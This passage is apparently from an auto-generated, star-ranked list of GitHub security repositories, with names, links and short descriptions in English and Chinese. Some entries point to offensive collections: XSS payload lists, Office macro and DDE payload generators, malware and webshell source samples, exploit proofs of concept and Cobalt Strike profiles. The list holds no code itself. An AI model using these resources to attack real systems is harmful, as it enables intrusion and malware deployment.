[ihack4falafel/oscp](https://github.com/ihack4falafel/oscp) Collection of things made during my OSCP journey - [**521**星][3y] [vasanthk/web-security-basics](https://github.com/vasanthk/web-security-basics) web 安全基础 - [**504**星][2m] [hugetiny/awesome-vpn](https://github.com/hugetiny/awesome-vpn) 免费的代理,科学上网,翻墙,梯子大集合 - [**501**星][4m] [PHP] [susers/writeups](https://github.com/susers/writeups) 国内各大CTF赛题及writeup整理 - [**500**星][3y] [tengzhangchao/sec-box](https://github.com/tengzhangchao/sec-box) information security Tools Box (信息安全工具以及资源集合) - [**498**星][3m] [govolution/betterdefaultpasslist](https://github.com/govolution/betterdefaultpasslist) list includes default credentials from various manufacturers for their products like NAS, ERP, ICS etc. - [**496**星][2y] [sergey-pronin/awesome-vulnerability-research](https://github.com/sergey-pronin/Awesome-Vulnerability-Research) A curated list of the awesome resources about the Vulnerability Research - [**494**星][2m] [C] [hasherezade/demos](https://github.com/hasherezade/demos) Demos of various injection techniques found in malware - [**490**星][2y] [C++] [turbo/kpti-poc-collection](https://github.com/turbo/kpti-poc-collection) Meltdown/Spectre PoC src collection. - [**489**星][14d] [C] [jiayy/android_vuln_poc-exp](https://github.com/jiayy/android_vuln_poc-exp) This project contains pocs and exploits for vulneribilities I found (mostly) - [**488**星][2y] [b-mueller/android_app_security_checklist](https://github.com/b-mueller/android_app_security_checklist) Android App Security Checklist - [**487**星][2m] [radareorg/awesome-radare2](https://github.com/radareorg/awesome-radare2) A curated list of awesome projects, articles and the other materials powered by Radare2 - [**486**星][1y] [lmy375/awesome-vmp](https://github.com/lmy375/awesome-vmp) 虚拟机分析相关资料 - [**480**星][1y] [ksluckow/awesome-symbolic-execution](https://github.com/ksluckow/awesome-symbolic-execution) A curated list of awesome symbolic execution resources including essential research papers, lectures, videos, and tools. - [**477**星][1y] [hack-with-github/powerful-plugins](https://github.com/hack-with-github/powerful-plugins) Powerful plugins and add-ons for hackers - [**476**星][23d] [PS] [mantvydasb/redteam-tactics-and-techniques](https://github.com/mantvydasb/RedTeam-Tactics-and-Techniques) Red Teaming Tactics and Techniques - [**472**星][12m] [PHP] [l3m0n/pentest_tools](https://github.com/l3m0n/pentest_tools) 收集一些小型实用的工具 - [**470**星][3y] [Shell] [g0tmi1k/os-scripts](https://github.com/g0tmi1k/os-scripts) Personal Collection of Operating Systems Scripts - [**468**星][29d] [meitar/awesome-cybersecurity-blueteam](https://github.com/meitar/awesome-cybersecurity-blueteam) A collection of awesome resources, tools, and other shiny things for cybersecurity blue teams. - [**465**星][2y] [Py] [coalfire-research/java-deserialization-exploits](https://github.com/coalfire-research/java-deserialization-exploits) A collection of curated Java Deserialization Exploits - [**465**星][1m] [gradiuscypher/infosec_getting_started](https://github.com/gradiuscypher/infosec_getting_started) A collection of resources/documentation/links/etc to help people learn about Infosec and break into the field. - [**463**星][3y] [remath/literature_review](https://github.com/remath/literature_review) Survey of program analysis research with a focus on machine code - [**462**星][6m] [C] [phoenhex/files](https://github.com/phoenhex/files) Phoenhex 团队的exploits/POCs/presentation - [**461**星][2y] [Py] [0xdeadbeefjerky/office-dde-payloads](https://github.com/0xdeadbeefjerky/office-dde-payloads) Collection of scripts and templates to generate Office documents embedded with the DDE, macro-less command execution technique. - [**460**星][5m] [C++] [comaeio/opcde](https://github.com/comaeio/opcde) OPCDE Cybersecurity Conference Materials - [**456**星][4y] [C] [haka-security/haka](https://github.com/haka-security/haka) 捕获TCP / IP数据包,并根据Lua策略文件对其进行过滤 - [**455**星][22d] [m1ghtym0/browser-pwn](https://github.com/m1ghtym0/browser-pwn) An updated collection of resources targeting browser-exploitation. - [**454**星][10m] [C++] [ahupowerdns/hello-dns](https://github.com/ahupowerdns/hello-dns) Hello and welcome to DNS! - [**449**星][4y] [Py] [alienvault-labs/alienvaultlabs](https://github.com/alienvault-labs/alienvaultlabs) Alienvault Labs Projects Random Stuff - [**442**星][17d] [TSQL] [404notf0und/security-data-analysis-and-visualization](https://github.com/404notf0und/security-data-analysis-and-visualization) 2018-2020青年安全圈-活跃技术博主/博客 - [**439**星][2y] [magoo/redteam-plan](https://github.com/magoo/redteam-plan) 规划 redteam 练习时要考虑的问题 - [**438**星][1y] [meitar/awesome-lockpicking](https://github.com/meitar/awesome-lockpicking) 有关锁、保险箱、钥匙的指南、工具及其他资源的列表 - [**437**星][4m] [re4lity/hacking-with-golang](https://github.com/re4lity/hacking-with-golang) Golang安全资源合集 - [**431**星][2y] [rsmudge/malleable-c2-profiles](https://github.com/rsmudge/malleable-c2-profiles) Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x. - [**431**星][24d] [xuanhun/hackingresource](https://github.com/xuanhun/hackingresource) “玄魂工作室--安全圈” 知识星球内资源汇总 - [**429**星][4m] [Shell] [ashishb/android-malware](https://github.com/ashishb/android-malware) Collection of android malware samples - [**426**星][1m] [dropsofzut/awesome-security-weixin-official-accounts](https://github.com/dropsofzut/awesome-security-weixin-official-accounts) 网络安全类公众号推荐 - [**425**星][4m] [jack-liang/kalitools](https://github.com/jack-liang/kalitools) Kali Linux工具清单 - [**424**星][3y] [pgaijin66/xss-payloads](https://github.com/pgaijin66/xss-payloads) List of advanced XSS payloads - [**424**星][2y] [ring04h/papers](https://github.com/ring04h/papers) my security summit papers - [**423**星][12m] [Lua] [w3h/icsmaster](https://github.com/w3h/icsmaster) 整合工控安全相关资源 - [**421**星][6m] [preos-security/awesome-firmware-security](https://github.com/preos-security/awesome-firmware-security) Awesome Firmware Security & Other Helpful Documents - [**420**星][9m] [Shell] [sroberts/awesome-iocs](https://github.com/sroberts/awesome-iocs) A collection of sources of indicators of compromise. - [**415**星][2y] [zhengmin1989/greatiosjailbreakmaterial](https://github.com/zhengmin1989/greatiosjailbreakmaterial) Great iOS Jailbreak Material! - I read hundreds of papers and PPTs. Only list the most useful materials here! - [**411**星][15d] [Py] [bl4de/security-tools](https://github.com/bl4de/security-tools) Collection of small security tools created mostly in Python. CTFs, pentests and so on - [**411**星][15d] [HTML] [w3c/webappsec](https://github.com/w3c/webappsec) Web App安全工作组 - [**411**星][2m] [husnainfareed/awesome-ethical-hacking-resources](https://github.com/husnainfareed/Awesome-Ethical-Hacking-Resources) Awesome Resources For Learning Hacking & Pentesting - [**409**星][3m] [ph055a/osint-collection](https://github.com/ph055a/osint-collection) Maintained collection of OSINT related resources. (All Free & Actionable) - [**407**星][2y] [JS] [0xdea/frida-scripts](https://github.com/0xdea/frida-scripts) A collection of my Frida.re instrumentation scripts to facilitate reverse engineering of mobile apps. - [**407**星][8m] [kai5263499/osx-security-awesome](https://github.com/kai5263499/osx-security-awesome) A collection of OSX and iOS security resources - [**405**星][3y] [Py] [xitu/macos-security-and-privacy-guide](https://github.com/xitu/macos-security-and-privacy-guide) A practical guide to securing macOS. - [**397**星][7m] [HTML] [gexos/hacking-tools-repository](https://github.com/gexos/hacking-tools-repository) A list of security/hacking tools that have been collected from the internet. Suggestions are welcomed. - [**396**星][4m] [ansjdnakjdnajkd/ios](https://github.com/ansjdnakjdnajkd/ios) iOS渗透测试最有用的工具 - [**395**星][2y] [sweis/crypto-might-not-suck](https://github.com/sweis/crypto-might-not-suck) List of crypto projects that might not suck - [**393**星][2y] [r0ysue/osg-translationteam](https://github.com/r0ysue/osg-translationteam) 看雪iOS安全小组的翻译团队作品集合,如有勘误,欢迎斧正! - [**392**星][2m] [dsopas/assessment-mindset](https://github.com/dsopas/assessment-mindset) 安全相关的思维导图, 可用于pentesting, bug bounty, red-teamassessments - [**391**星][2m] [milabs/awesome-linux-rootkits](https://github.com/milabs/awesome-linux-rootkits) awesome-linux-rootkits - [**391**星][13d] [Py] [random-robbie/my-shodan-scripts](https://github.com/random-robbie/my-shodan-scripts) Collection of Scripts for shodan searching stuff. - [**389**星][2m] [tobiasbueschel/awesome-pokemon](https://github.com/tobiasbueschel/awesome-pokemon) A curated list of awesome Pokémon & Pokémon GO resources, tools and more. - [**388**星][2y] [PS] [shellntel/scripts](https://github.com/shellntel/scripts) A collection of scripts from the security professionals at www.shellntel.com. - [**386**星][2y] [m0l1ce/wooyunallbugs](https://github.com/m0l1ce/wooyunallbugs) wooyun_all_bugs - [**385**星][3m] [Jupyter Notebook] [endgameinc/ember](https://github.com/endgameinc/ember) 110万PE文件的数据集合, 可用于训练相关模型. PE文件信息主要包括: SHA256/histogram(直方图)/byteentropy(字节熵)/字符串/PE头信息/段信息/导入表/导出表 - [**383**星][2m] [thejambo/awesome-testing](https://github.com/thejambo/awesome-testing) A curated list of testing resources - [**379**星][1y] [CSS] [nowsecure/secure-mobile-development](https://github.com/nowsecure/secure-mobile-development) A Collection of Secure Mobile Development Best Practices - [**378**星][2y] [aozhimin/ios-debug-hacks](https://github.com/aozhimin/ios-debug-hacks) - [**376**星][5m] [xtiankisutsa/awesome-mobile-ctf](https://github.com/xtiankisutsa/awesome-mobile-ctf) This is a curated list of mobile based CTFs, write-ups and vulnerable apps. Most of them are android based due to the popularity of the platform. - [**375**星][8m] [opencybertranslationproject/linux-basics-for-hackers](https://github.com/opencybertranslationproject/linux-basics-for-hackers) 书籍《Linux Basics for Hackers》2019版中文翻译版 - [**374**星][3m] [AngelScript] [inquest/malware-samples](https://github.com/inquest/malware-samples) A collection of malware samples and relevant dissection information, most probably referenced from - [**373**星][3m] [renwax23/xss-payloads](https://github.com/renwax23/xss-payloads) List of XSS Vectors/Payloads - [**372**星][3y] [PHP] [nikicat/web-malware-collection](https://github.com/nikicat/web-malware-collection) Clone of svn repository of - [**370**星][11m] [Py] [awslabs/aws-security-automation](https://github.com/awslabs/aws-security-automation) Collection of scripts and resources for DevSecOps and Automated Incident Response Security - [**369**星][30d] [fkromer/awesome-ros2](https://github.com/fkromer/awesome-ros2) The Robot Operating System Version 2.0 is awesome! - [**366**星][2y] [PHP] [attackercan/regexp-security-cheatsheet](https://github.com/attackercan/regexp-security-cheatsheet) - [**366**星][2m] [Go] [tomnomnom/httprobe](https://github.com/tomnomnom/httprobe) Take a list of domains and probe for working HTTP and HTTPS servers - [**366**星][2y] [wtsxdev/malware-analysis](https://github.com/wtsxdev/malware-analysis) List of awesome malware analysis tools and resources - [**364**星][8m] [Py] [orangetw/awesome-jenkins-rce-2019](https://github.com/orangetw/awesome-jenkins-rce-2019) There is no pre-auth RCE in Jenkins since May 2017, but this is the one! - [**363**星][10m] [fr0gger/awesome-ida-x64-olly-plugin](https://github.com/fr0gger/awesome-ida-x64-olly-plugin) IDA x64DBG OllyDBG 插件收集 - [**363**星][13d] [hongrisec/web-security-attack](https://github.com/hongrisec/web-security-attack) Web安全相关内容 - [**358**星][5m] [b3nac/android-reports-and-resources](https://github.com/b3nac/android-reports-and-resources) A big list of Android Hackerone disclosed reports and other resources. - [**356**星][5m] [Py] [a3sal0n/cyberthreathunting](https://github.com/a3sal0n/cyberthreathunting) A collection of resources for Threat Hunters - [**355**星][29d] [Py] [lockgit/hacking](https://github.com/lockgit/hacking) Hacking工具收集 - [**354**星][14d] [Py] [alecmuffett/real-world-onion-sites](https://github.com/alecmuffett/real-world-onion-sites) This is a list of substantial, commercial-or-social-good mainstream websites which provide onion services. - [**354**星][4y] [fireeye/iocs](https://github.com/fireeye/iocs) FireEye Publicly Shared Indicators of Compromise (IOCs) - [**354**星][3y] [virajkulkarni14/webdevelopersecuritychecklist](https://github.com/virajkulkarni14/webdevelopersecuritychecklist) A checklist of important security issues you should consider when creating a web application. - [**352**星][4y] [Java] [rsmudge/cortana-scripts](https://github.com/rsmudge/cortana-scripts) A collection of Cortana scripts that you may use with Armitage and Cobalt Strike 2.x. Cortana Scripts are not compatible with Cobalt Strike 3.x. Cobalt Strike 3.x uses a variant of Cortana called Aggressor Script. - [**351**星][4m] [Shell] [maldevel/pentestkit](https://github.com/maldevel/pentestkit) 渗透脚本和工具 - [**350**星][1m] [Shell] [fanyueciyuan/eazy-for-ss](https://github.com/fanyueciyuan/eazy-for-ss) A Bypassgfw Collection - [**345**星][3m] [softwareunderground/awesome-open-geoscience](https://github.com/softwareunderground/awesome-open-geoscience) Curated from repositories that make our lives as geoscientists, hackers and data wranglers easier or just more awesome - [**342**星][2y] [C++] [ele7enxxh/poc-exp](https://github.com/ele7enxxh/poc-exp) 某些 Android 漏洞的poc/exp - [**341**星][2y] [slowmist/eos-bp-nodes-security-checklist](https://github.com/slowmist/eos-bp-nodes-security-checklist) EOS超级节点安全执行指南 - [**335**星][2y] [PS] [arno0x/powershellscripts](https://github.com/arno0x/powershellscripts) Collection of PowerShell scripts - [**335**星][10d] [stamparm/ipsum](https://github.com/stamparm/ipsum) Daily feed of bad IPs (with blacklist hit scores) - [**334**星][15d] [PS] [mgeeky/penetration-testing-tools](https://github.com/mgeeky/penetration-testing-tools) A collection of my Penetration Testing scripts, tools, cheatsheets collected over years, used during real-world assignments or collected from various good quality sources. - [**332**星][2m] [Jupyter Notebook] [beeva/beeva-best-practices](https://github.com/beeva/beeva-best-practices) Best Practices and Style Guides in BEEVA - [**331**星][3y] [Visual Basic .NET] [khr0x40sh/macroshop](https://github.com/khr0x40sh/macroshop) Collection of scripts to aid in delivering payloads via Office Macros. Most are python. See - [**331**星][1y] [snyk/vulnerabilitydb](https://github.com/snyk/vulnerabilitydb) Snyk's public vulnerability database - [**330**星][11m] [Py] [justicerage/freedomfighting](https://github.com/justicerage/freedomfighting) A collection of scripts which may come in handy during your freedom fighting activities. - [**327**星][10m] [pxlpnk/awesome-ruby-security](https://github.com/pxlpnk/awesome-ruby-security) Awesome Ruby Security resources - [**327**星][12m] [Py] [secwiki/office-exploits](https://github.com/secwiki/office-exploits) office-exploits Office漏洞集合 - [**324**星][9m] [JS] [zyszys/awesome-captcha](https://github.com/zyszys/awesome-captcha) Curated list of awesome captcha libraries and captcha crack tools. - [**323**星][4m] [PS] [kmkz/pentesting](https://github.com/kmkz/pentesting) 渗透测试技巧 - [**321**星][3m] [HTML] [eugenekolo/sec-tools](https://github.com/eugenekolo/sec-tools) A set of security related tools - [**320**星][3m] [xsleaks/xsleaks](https://github.com/xsleaks/xsleaks) A collection of browser-based side channel attack vectors. - [**318**星][13d] [cryptax/confsec](https://github.com/cryptax/confsec) Security, hacking conferences (list) - [**316**星][1y] [PHP] [grt1st/wooyun_search](https://github.com/grt1st/wooyun_search) 乌云公开漏洞、知识库搜索 search from wooyun.org - [**315**星][2y] [burntmybagel/oscp-prep](https://github.com/burntmybagel/oscp-prep) A list of the resources I use as I get ready for the exam - [**315**星][1m] [trimstray/technical-whitepapers](https://github.com/trimstray/technical-whitepapers) 收集:IT白皮书、PPT、PDF、Hacking、Web应用程序安全性、数据库、逆向等 - [**312**星][11m] [Shell] [swoodford/aws](https://github.com/swoodford/aws) A collection of bash shell scripts for automating various tasks with Amazon Web Services using the AWS CLI and jq. - [**310**星][1y] [1522402210/2018-blackhat-tools-list](https://github.com/1522402210/2018-blackhat-tools-list) 2018 BlackHat Tools List - [**309**星][2m] [no-github/dork-admin](https://github.com/no-github/dork-admin) 盘点近年来的数据泄露、供应链污染事件 - [**306**星][2m] [Py] [rhinosecuritylabs/cves](https://github.com/rhinosecuritylabs/cves) A collection of proof-of-concept exploit scripts written by the team at Rhino Security Labs for various CVEs. - [**306**星][2y] [Py] [timsutton/python-macadmin-tools](https://github.com/timsutton/python-macadmin-tools) List of open-source Python-based Mac sysadmin tools - [**305**星][2y] [Java] [joaomatosf/javadeserh2hc](https://github.com/joaomatosf/javadeserh2hc) Sample codes written for the Hackers to Hackers Conference magazine 2017 (H2HC). - [**305**星][3y] [C++] [m0n0ph1/malware-1](https://github.com/m0n0ph1/malware-1) Malware source code samples leaked online uploaded to GitHub for those who want to analyze the code. - [**301**星][12m] [Assembly] [guitmz/virii](https://github.com/guitmz/virii) Collection of ancient computer virus source codes - [**300**星][11m] [Shell] [ctf-wiki/ctf-tools](https://github.com/ctf-wiki/ctf-tools) CTF 工具集合 - [**299**星][25d] [JS] [aws-samples/aws-serverless-security-workshop](https://github.com/aws-samples/aws-serverless-security-workshop) In this workshop, you will learn techniques to secure a serverless application built with AWS Lambda, Amazon API Gateway and RDS Aurora. We will cover AWS services and features you can leverage to improve the security of a serverless applications in 5 domains: identity & access management, code, data, infrastructure, logging & monitoring. - [**299**星][2y] [C] [pwning/docs](https://github.com/pwning/docs) Tips, Tricks, and Suggestions for Running a CTF - [**298**星][1y] [Shell] [yw9381/burp_suite_doc_zh_cn](https://github.com/yw9381/burp_suite_doc_zh_cn) 这是基于Burp Suite官方文档翻译而来的中文版文档 - [**297**星][5m] [tanprathan/owasp-testing-checklist](https://github.com/tanprathan/owasp-testing-checklist) OWASP based Web Application Security Testing Checklist is an Excel based checklist which helps you to track the status of completed and pending test cases. - [**295**星][1y] [findneo/newbie-security-list](https://github.com/findneo/newbie-security-list) 网络安全学习资料,欢迎补充 - [**295**星][9m] [vysecurity/domainfrontinglists](https://github.com/vysecurity/DomainFrontingLists) A list of Domain Frontable Domains by CDN - [**294**星][3y] [lucyoa/ctf-wiki](https://github.com/lucyoa/ctf-wiki) Hacking techniques useful during CTFs - [**294**星][7m] [JS] [ma3k4h3d/papers](https://github.com/ma3k4h3d/papers) Some papers about cyber security - [**294**星][10m] [HTML] [s1gh/ctf-literature](https://github.com/s1gh/ctf-literature) Collection of free books, papers and articles related to CTF challenges. - [**292**星][8m] [Py] [cesar-rodriguez/terrascan](https://github.com/cesar-rodriguez/terrascan) Collection of security and best practice test for static code analysis of terraform templates - [**290**星][30d] [C#] [matterpreter/offensivecsharp](https://github.com/matterpreter/offensivecsharp) Collection of Offensive C# Tooling - [**289**星][3y] [Py] [dhilipsiva/webapp-checklist](https://github.com/dhilipsiva/webapp-checklist) Technical details that a programmer of a web application should consider before making the site public. - [**289**星][15d] [Java] [mr-xn/penetration_testing_poc](https://github.com/mr-xn/penetration_testing_poc) 渗透测试有关的POC、EXP、脚本、提权、小工具等 - [**287**星][10m] [wallarm/awesome-nginx-security](https://github.com/wallarm/awesome-nginx-security) A curated list of awesome links related to application/API security in NGINX environment. - [**286**星][3y] [Py] [nanshihui/poccollect](https://github.com/nanshihui/poccollect) a plenty of poc based on python - [**285**星][3y] [HTML] [buddhalabs/packetstorm-exploits](https://github.com/buddhalabs/packetstorm-exploits) Collection of publicly available exploits from Packetstorm - [**284**星][3m] [C] [ayeks/sgx-hardware](https://github.com/ayeks/sgx-hardware) This is a list of hardware which is supports Intel SGX - Software Guard Extensions. - [**282**星][23d] [PHP] [nico3333fr/csp-useful](https://github.com/nico3333fr/csp-useful) Collection of scripts, thoughts about CSP (Content Security Policy) - [**281**星][3m] [C] [0xdea/exploits](https://github.com/0xdea/exploits) 研究员 0xdeadbeef 的公开exploits 收集 - [**277**星][2y] [Assembly] [tinysec/windows-syscall-table](https://github.com/tinysec/windows-syscall-table) Win XP 到 Win 10 的系统调用表,包括 SSDT 和 Shadow SSDT - [**276**星][4m] [mattnotmax/cyberchef-recipes](https://github.com/mattnotmax/cyberchef-recipes) A list of cyber-chef recipes - [**273**星][3m] [JS] [hynekpetrak/javascript-malware-collection](https://github.com/hynekpetrak/javascript-malware-collection) Collection of almost 40.000 javascript malware samples - [**272**星][18d] [JS] [ropnop/serverless_toolkit](https://github.com/ropnop/serverless_toolkit) A collection of useful Serverless functions I use when pentesting - [**272**星][18d] [zodiacon/alltools](https://github.com/zodiacon/alltools) All reasonably stable tools - [**271**星][8m] [offensive-security/nethunter-lrt](https://github.com/offensive-security/nethunter-lrt) The Nethunter Linux Root Toolkit is a collection of bash scripts which install Nethunter onto a supported device. - [**270**星][2y] [Java] [reoky/android-crackme-challenge](https://github.com/reoky/android-crackme-challenge) A collection of reverse engineering challenges for learning about the Android operating system and mobile security. - [**267**星][2y] [PHP] [sqlmapproject/testenv](https://github.com/sqlmapproject/testenv) A collection of web pages vulnerable to SQL injection flaws - [**265**星][13d] [Py] [den4uk/andriller](https://github.com/den4uk/andriller) a collection of forensic tools for smartphones - [**260**星][5m] [zhaoweiho/web-sec-interview](https://github.com/zhaoweiho/web-sec-interview) Information Security (Web Security/Penetration Testing Direction) Interview Questions/Solutions 信息安全(Web安全/渗透测试方向)面试题/解题思路 - [**260**星][1m] [thelsa/cs-checklist](https://github.com/thelsa/cs-checklist) PC客户端(C-S架构)渗透测试checklist / Client side(C-S) penestration checklist - [**258**星][24d] [Jupyter Notebook] [aws-samples/aws-security-workshops](https://github.com/aws-samples/aws-security-workshops) A collection of the latest AWS Security workshops - [**258**星][30d] [Py] [inforion/idapython-cheatsheet](https://github.com/inforion/idapython-cheatsheet) Scripts and cheatsheets for IDAPython - [**258**星][2y] [Go] [netxfly/xsec-ip-database](https://github.com/netxfly/xsec-ip-database) 恶意IP 和域名库。通过爬虫定期拉取网络中公开的恶意ip 库来获取恶意IP和域名,且支持与自有的其他安全产品联动(HIDS、WAF、蜜罐、防火墙等产品),实时更新IP库 - [**257**星][4y] [C] [roxas75/rxtools](https://github.com/roxas75/rxtools) a collection of hacking tools for Nintendo 3DS/3DSXL/2DS, compatible with all the system versions from 4.1 to 9.2 - [**256**星][11m] [C++] [ramadhanamizudin/malware](https://github.com/ramadhanamizudin/malware) Malware Samples. Uploaded to GitHub for those want to analyse the code. Code mostly from: - [**253**星][5m] [C++] [tonychen56/hackertools](https://github.com/tonychen56/hackertools) 使用MFC编写的病毒技术合集 - [**252**星][12m] [crytic/awesome-ethereum-security](https://github.com/crytic/awesome-ethereum-security) A curated list of awesome Ethereum security references - [**250**星][9m] [0x4d31/awesome-oscp](https://github.com/0x4d31/awesome-oscp) A curated list of awesome OSCP resources - [**249**星][1m] [pomerium/awesome-zero-trust](https://github.com/pomerium/awesome-zero-trust) A curated collection of awesome resources for the zero-trust security model. - [**246**星][30d] [C++] [strazzere/android-scripts](https://github.com/strazzere/android-scripts) Android逆向脚本收集 - [**245**星][2y] [ludiosarchive/unfixed-security-bugs](https://github.com/ludiosarchive/unfixed-security-bugs) 已公开但未修复的漏洞列表。包括Chrome、VirtualBox、WeeChat、Windows(7-10)等知名软件。 - [**244**星][2y] [hsis007/useful_websites_for_pentester](https://github.com/hsis007/useful_websites_for_pentester) This repository is to make life of the pentester easy as it is a collection of the websites that can be used by pentesters for day to day studies and to remain updated. - [**244**星][3y] [PHP] [tdifg/webshell](https://github.com/tdifg/webshell) WebShell Collect - [**243**星][10m] [accordbox/awesome-scrapy](https://github.com/accordbox/awesome-scrapy) A curated list of awesome packages, articles, and other cool resources from the Scrapy community. - [**243**星][2m] [croqaz/awesome-decentralized](https://github.com/croqaz/awesome-decentralized) Awesome distributed, decentralized, p2p apps or tools - [**243**星][17d] [euphrat1ca/security_w1k1](https://github.com/euphrat1ca/security_w1k1) collect - [**243**星][3y] [misterch0c/awesome-hacking](https://github.com/misterch0c/awesome-hacking) A collection of various awesome lists for hackers, pentesters and security researchers - [**241**星][2y] [kinimiwar/penetration-testing](https://github.com/kinimiwar/penetration-testing) List of awesome penetration testing resources, tools and other shiny things - [**239**星][16d] [pe3zx/my-infosec-awesome](https://github.com/pe3zx/my-infosec-awesome) My curated list of awesome links, resources and tools on infosec related topics - [**236**星][3m] [Py] [boy-hack/airbug](https://github.com/boy-hack/airbug) Airbug(空气洞),收集漏洞poc用于安全产品 - [**233**星][8m] [C] [ctz/cifra](https://github.com/ctz/cifra) A collection of cryptographic primitives targeted at embedded use. - [**233**星][2y] [wizardforcel/web-hacking-101-zh](https://github.com/wizardforcel/web-hacking-101-zh) - [**231**星][15d] [cpuu/awesome-fuzzing](https://github.com/cpuu/awesome-fuzzing) A curated list of awesome Fuzzing(or Fuzz Testing) for software security - [**228**星][6m] [guardrailsio/awesome-dotnet-security](https://github.com/guardrailsio/awesome-dotnet-security) Awesome .NET Security Resources - [**227**星][2y] [C#] [t3ntman/social-engineering-payloads](https://github.com/t3ntman/social-engineering-payloads) Collection of social engineering payloads - [**224**星][23d] [vixentael/my-talks](https://github.com/vixentael/my-talks) List of my talks and workshops: security engineering, applied cryptography, secure software development - [**223**星][3m] [C] [david942j/ctf-writeups](https://github.com/david942j/ctf-writeups) Collection of scripts and writeups - [**223**星][15d] [decalage2/awesome-security-hardening](https://github.com/decalage2/awesome-security-hardening) A collection of awesome security hardening guides, tools and other resources - [**222**星][14d] [C#] [carlospolop/privilege-escalation-awesome-scripts-suite](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) PEASS - Privilege Escalation Awesome Scripts SUITE (with colors) - [**222**星][9m] [jesusprubio/awesome-nodejs-pentest](https://github.com/jesusprubio/awesome-nodejs-pentest) Awesome Node.js for pentesters - [**222**星][2m] [PS] [tonyphipps/meerkat](https://github.com/tonyphipps/meerkat) A collection of PowerShell modules designed for artifact gathering and reconnaisance of Windows-based endpoints. - [**221**星][2y] [sh4hin/mobileapp-pentest-cheatsheet](https://github.com/sh4hin/mobileapp-pentest-cheatsheet) The Mobile App Pentest cheat sheet was created to provide concise collection of high value information on specific mobile application penetration testing topics. - [**221**星][5m] [security-checklist/php-security-check-list](https://github.com/security-checklist/php-security-check-list) PHP Security Check List [ EN ] - [**219**星][18d] [JS] [strangerealintel/cyberthreatintel](https://github.com/strangerealintel/cyberthreatintel) Analysis of malware and Cyber Threat Intel of APT and cybercriminals groups - [**217**星][3m] [CSS] [7dog7/bottleneckosmosis](https://github.com/7dog7/bottleneckosmosis) 瓶颈渗透,web渗透,red红队,fuzz param,注释,js字典,ctf - [**217**星][2y] [cure53/browser-sec-whitepaper](https://github.com/cure53/browser-sec-whitepaper) Cure53 Browser Security White Paper - [**217**星][2y] [Py] [euphrat1ca/fuzzdb-collect](https://github.com/euphrat1ca/fuzzdb-collect) 网络上安全资源的搜集 - [**216**星][10m] [puresec/awesome-serverless-security](https://github.com/puresec/awesome-serverless-security) A curated list of awesome serverless security resources such as (e)books, articles, whitepapers, blogs and research papers. - [**214**星][13d] [shogunlab/awesome-hyper-v-exploitation](https://github.com/shogunlab/awesome-hyper-v-exploitation) A curated list of Hyper-V exploitation resources, fuzzing and vulnerability research. - [**213**星][11m] [jeansgit/redteam](https://github.com/jeansgit/redteam) RedTeam资料收集整理 - [**209**星][7m] [PHP] [momosecurity/rhizobia_p](https://github.com/momosecurity/rhizobia_p) PHP安全SDK及编码规范 - [**209**星][1m] [sigp/solidity-security-blog](https://github.com/sigp/solidity-security-blog) Comprehensive list of known attack vectors and common anti-patterns - [**207**星][1y] [faizann24/resources-for-learning-hacking](https://github.com/faizann24/resources-for-learning-hacking) All the resources I could find for learning Ethical Hacking and penetration testing. - [**207**星][15d] [vschiavoni/sgx-papers](https://github.com/vschiavoni/sgx-papers) A list of system papers using/about Intel SGX - [**204**星][2y] [evnm/research-in-production](https://github.com/evnm/research-in-production) A collection of research papers categorized by real-world systems that enact them - [**201**星][13d] [anudeepnd/blacklist](https://github.com/anudeepnd/blacklist) Curated and well-maintained host file to block ads, tracking, cryptomining and more! Updated regularly. - [**201**星][1y] [Py] [sec-bit/awesome-buggy-erc20-tokens](https://github.com/sec-bit/awesome-buggy-erc20-tokens) A Collection of Vulnerabilities in ERC20 Smart Contracts With Tokens Affected - [**200**星][1y] [iamcryptoki/snowden-archive](https://github.com/iamcryptoki/snowden-archive) - [**199**星][4y] [Java] [pwntester/serialkillerbypassgadgetcollection](https://github.com/pwntester/serialkillerbypassgadgetcollection) Collection of bypass gadgets to extend and wrap ysoserial payloads - [**198**星][1m] [F#] [b2r2-org/b2r2](https://github.com/b2r2-org/b2r2) B2R2 is a collection of useful algorithms, functions, and tools for binary analysis. - [**198**星][10m] [hannoch/scaner](https://github.com/hannoch/scaner) 开源扫描器的集合,包括子域枚举、数据库漏洞扫描器、弱密码或信息泄漏扫描器、端口扫描器、指纹扫描器以及其他大规模扫描仪、模块扫描器等。对于其他著名的扫描工具,如:awvs、nmap,w3af将不包含在集合范围内。 - [**198**星][5y] [rutkai/pentest-bookmarks](https://github.com/rutkai/pentest-bookmarks) A collection of penetration testing related sites - [**197**星][1y] [Py] [pstirparo/mac4n6](https://github.com/pstirparo/mac4n6) Collection of forensics artifacs location for Mac OS X and iOS - [**196**星][4m] [jdonsec/allthingsssrf](https://github.com/jdonsec/allthingsssrf) This is a collection of writeups, cheatsheets, videos, books related to SSRF in one single location - [**196**星][3m] [noorqureshi/kali-linux-cheatsheet](https://github.com/noorqureshi/kali-linux-cheatsheet) Kali Linux Cheat Sheet for Penetration Testers - [**196**星][10m] [zardus/wargame-nexus](https://github.com/zardus/wargame-nexus) An sorted and updated list of security wargame sites. - [**195**星][9m] [Py] [lingerhk/hacking_script](https://github.com/lingerhk/hacking_script) 开发或收集的一些网络安全方面的脚本、小工具 - [**195**星][12m] [JS] [zer4tul/hacker-howto](https://github.com/zer4tul/hacker-howto) 本文原文由知名Hacker Eric S. Raymond 所撰写,教你如何成为一名黑客。 - [**194**星][1y] [HTML] [yaseng/iot-security-wiki](https://github.com/yaseng/iot-security-wiki) IOT security wiki - [**193**星][4m] [ObjC] [riusksk/secconarchive](https://github.com/riusksk/secconarchive) Security Conference Archive - [**192**星][4m] [Py] [jrspruitt/ubi_reader](https://github.com/jrspruitt/ubi_reader) Collection of Python scripts for reading information about and extracting data from UBI and UBIFS images. - [**192**星][7m] [pochubs/pochubs](https://github.com/pochubs/pochubs) PocHubs是为了整合网上知名开源框架的漏洞详细和POC - [**188**星][4y] [Lua] [automayt/ics-pcap](https://github.com/automayt/ics-pcap) ICS/SCADA PCAP收集 - [**186**星][2m] [feeicn/securityinterviewquestions](https://github.com/feeicn/securityinterviewquestions) 网络信息安全从业者面试指南(持续补充各公司招聘题目和侧重点) - [**186**星][1y] [yellowbyte/analysis-of-anti-analysis](https://github.com/yellowbyte/analysis-of-anti-analysis) writings on anti-reverse engineering - 